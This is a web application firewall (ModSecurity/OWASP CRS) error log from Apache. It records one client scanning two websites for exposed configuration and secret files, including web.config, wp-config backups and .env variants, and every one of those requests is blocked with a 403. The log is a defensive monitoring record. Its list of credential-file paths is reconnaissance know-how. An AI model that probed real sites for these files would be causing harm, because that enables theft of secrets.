[Mon May 11 11:40:19.642139 2026] [security2:error] [pid 1256241:tid 1256247] [client 185.177.72.9:64154] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGkApkIEwRJMyDaV55KtAAAAUE"]
[Mon May 11 11:40:19.671770 2026] [security2:error] [pid 1254242:tid 1254266] [client 185.177.72.9:64166] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /Web.config found within REQUEST_FILENAME: /web.config5"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/web.config5"] [unique_id "agGkA74KNmD_mZ_vlf80lwAAAFU"]
[Mon May 11 11:40:19.672168 2026] [security2:error] [pid 1254242:tid 1254266] [client 185.177.72.9:64166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/web.config5"] [unique_id "agGkA74KNmD_mZ_vlf80lwAAAFU"]
[Mon May 11 11:40:19.926074 2026] [security2:error] [pid 1254179:tid 1254194] [client 43.128.104.75:51940] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.culturesvoile.com"] [uri "/"] [unique_id "agGkA2S6k_SCYd1AVZqqtwAAAQ0"], referer: http://www.culturesvoile.com
[Mon May 11 11:40:21.394174 2026] [security2:error] [pid 1254242:tid 1254266] [client 185.177.72.9:64166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGkA74KNmD_mZ_vlf80lwAAAFU"]
[Mon May 11 11:40:21.421559 2026] [security2:error] [pid 1254179:tid 1254186] [client 185.177.72.9:64180] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /Web.config found within REQUEST_FILENAME: /web.config_local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/web.config_local"] [unique_id "agGkBWS6k_SCYd1AVZqquQAAAQU"]
[Mon May 11 11:40:21.422713 2026] [security2:error] [pid 1254179:tid 1254186] [client 185.177.72.9:64180] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/web.config_local"] [unique_id "agGkBWS6k_SCYd1AVZqquQAAAQU"]
[Mon May 11 11:40:23.125711 2026] [security2:error] [pid 1254179:tid 1254186] [client 185.177.72.9:64180] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGkBWS6k_SCYd1AVZqquQAAAQU"]
[Mon May 11 11:40:23.157977 2026] [security2:error] [pid 1254328:tid 1254353] [client 185.177.72.9:3564] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /Web.config found within REQUEST_FILENAME: /web.config_local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/web.config_local"] [unique_id "agGkB0Rdw2n9wv6Ai48EHAAAAJg"]
[Mon May 11 11:40:23.158516 2026] [security2:error] [pid 1254328:tid 1254353] [client 185.177.72.9:3564] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/web.config_local"] [unique_id "agGkB0Rdw2n9wv6Ai48EHAAAAJg"]
[Mon May 11 11:40:24.636249 2026] [security2:error] [pid 1254328:tid 1254353] [client 185.177.72.9:3564] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGkB0Rdw2n9wv6Ai48EHAAAAJg"]
[Mon May 11 11:40:40.380598 2026] [security2:error] [pid 1254133:tid 1254147] [client 185.177.72.9:15330] ModSecurity: Warning. Matched phrase "wp-config.old" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.old found within REQUEST_FILENAME: /webapi/wp-config.old_development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/webapi/wp-config.old_development"] [unique_id "agGkGBjZymfuKpjWXeh4-wAAAMs"]
[Mon May 11 11:40:40.384875 2026] [security2:error] [pid 1254133:tid 1254147] [client 185.177.72.9:15330] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/webapi/wp-config.old_development"] [unique_id "agGkGBjZymfuKpjWXeh4-wAAAMs"]
[Mon May 11 11:40:42.612907 2026] [security2:error] [pid 1254133:tid 1254147] [client 185.177.72.9:15330] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGkGBjZymfuKpjWXeh4-wAAAMs"]
[Mon May 11 11:40:42.639106 2026] [security2:error] [pid 1254133:tid 1254149] [client 185.177.72.9:15336] ModSecurity: Warning. Matched phrase "wp-config.old" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.old found within REQUEST_FILENAME: /webapi/wp-config.old_development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/webapi/wp-config.old_development"] [unique_id "agGkGhjZymfuKpjWXeh4_gAAAM0"]
[Mon May 11 11:40:42.639735 2026] [security2:error] [pid 1254133:tid 1254149] [client 185.177.72.9:15336] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/webapi/wp-config.old_development"] [unique_id "agGkGhjZymfuKpjWXeh4_gAAAM0"]
[Mon May 11 11:40:43.859898 2026] [security2:error] [pid 1254133:tid 1254149] [client 185.177.72.9:15336] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGkGhjZymfuKpjWXeh4_gAAAM0"]
[Mon May 11 11:40:43.892588 2026] [security2:error] [pid 1254242:tid 1254256] [client 185.177.72.9:46674] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /webhook/.env.save_new"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/webhook/.env.save_new"] [unique_id "agGkG74KNmD_mZ_vlf80rAAAAEs"]
[Mon May 11 11:40:43.893066 2026] [security2:error] [pid 1254242:tid 1254256] [client 185.177.72.9:46674] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/webhook/.env.save_new"] [unique_id "agGkG74KNmD_mZ_vlf80rAAAAEs"]
[Mon May 11 11:40:45.049120 2026] [security2:error] [pid 1254242:tid 1254256] [client 185.177.72.9:46674] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGkG74KNmD_mZ_vlf80rAAAAEs"]
[Mon May 11 11:40:45.078367 2026] [security2:error] [pid 1254179:tid 1254183] [client 185.177.72.9:46680] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /webhook/.env.save_new"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/webhook/.env.save_new"] [unique_id "agGkHWS6k_SCYd1AVZqqywAAAQI"]
[Mon May 11 11:40:45.078839 2026] [security2:error] [pid 1254179:tid 1254183] [client 185.177.72.9:46680] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/webhook/.env.save_new"] [unique_id "agGkHWS6k_SCYd1AVZqqywAAAQI"]
[Mon May 11 11:40:46.305708 2026] [security2:error] [pid 1254179:tid 1254183] [client 185.177.72.9:46680] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGkHWS6k_SCYd1AVZqqywAAAQI"]
[Mon May 11 11:40:46.333252 2026] [security2:error] [pid 1256241:tid 1256255] [client 185.177.72.9:46696] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /webhook/.env.test.temp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/webhook/.env.test.temp"] [unique_id "agGkHpkIEwRJMyDaV55LDQAAAUk"]
[Mon May 11 11:40:46.336798 2026] [security2:error] [pid 1256241:tid 1256255] [client 185.177.72.9:46696] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/webhook/.env.test.temp"] [unique_id "agGkHpkIEwRJMyDaV55LDQAAAUk"]
[Mon May 11 11:40:47.548105 2026] [security2:error] [pid 1256241:tid 1256255] [client 185.177.72.9:46696] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGkHpkIEwRJMyDaV55LDQAAAUk"]
[Mon May 11 11:40:47.578636 2026] [security2:error] [pid 1254242:tid 1254453] [client 185.177.72.9:46698] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /webhook/.env.test.temp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/webhook/.env.test.temp"] [unique_id "agGkH74KNmD_mZ_vlf80tQAAAEY"]
[Mon May 11 11:40:47.578845 2026] [security2:error] [pid 1254242:tid 1254453] [client 185.177.72.9:46698] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/webhook/.env.test.temp"] [unique_id "agGkH74KNmD_mZ_vlf80tQAAAEY"]
[Mon May 11 11:40:48.789404 2026] [security2:error] [pid 1254242:tid 1254453] [client 185.177.72.9:46698] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGkH74KNmD_mZ_vlf80tQAAAEY"]
[Mon May 11 11:41:11.721123 2026] [security2:error] [pid 1256241:tid 1256256] [client 185.177.72.9:25828] ModSecurity: Warning. Matched phrase "wp-config.bak" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.bak found within REQUEST_FILENAME: /wp-config.bak.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/wp-config.bak.local"] [unique_id "agGkN5kIEwRJMyDaV55LIwAAAUo"]
[Mon May 11 11:41:11.721337 2026] [security2:error] [pid 1256241:tid 1256256] [client 185.177.72.9:25828] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/wp-config.bak.local"] [unique_id "agGkN5kIEwRJMyDaV55LIwAAAUo"]
[Mon May 11 11:41:13.902888 2026] [security2:error] [pid 1256241:tid 1256256] [client 185.177.72.9:25828] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGkN5kIEwRJMyDaV55LIwAAAUo"]
[Mon May 11 11:41:13.930026 2026] [security2:error] [pid 1254328:tid 1254379] [client 185.177.72.9:13616] ModSecurity: Warning. Matched phrase "wp-config.bak" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.bak found within REQUEST_FILENAME: /wp-config.bak.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/wp-config.bak.local"] [unique_id "agGkOURdw2n9wv6Ai48ESQAAAJY"]
[Mon May 11 11:41:13.930700 2026] [security2:error] [pid 1254328:tid 1254379] [client 185.177.72.9:13616] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/wp-config.bak.local"] [unique_id "agGkOURdw2n9wv6Ai48ESQAAAJY"]
[Mon May 11 11:41:15.150895 2026] [security2:error] [pid 1254328:tid 1254379] [client 185.177.72.9:13616] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGkOURdw2n9wv6Ai48ESQAAAJY"]
[Mon May 11 11:41:15.180244 2026] [security2:error] [pid 1254133:tid 1254154] [client 185.177.72.9:13626] ModSecurity: Warning. Matched phrase "wp-config.bak" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.bak found within REQUEST_FILENAME: /wp-config.bak_debug"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/wp-config.bak_debug"] [unique_id "agGkOxjZymfuKpjWXeh5IAAAANI"]
[Mon May 11 11:41:15.180577 2026] [security2:error] [pid 1254133:tid 1254154] [client 185.177.72.9:13626] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/wp-config.bak_debug"] [unique_id "agGkOxjZymfuKpjWXeh5IAAAANI"]
[Mon May 11 11:41:16.349403 2026] [security2:error] [pid 1254133:tid 1254154] [client 185.177.72.9:13626] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGkOxjZymfuKpjWXeh5IAAAANI"]
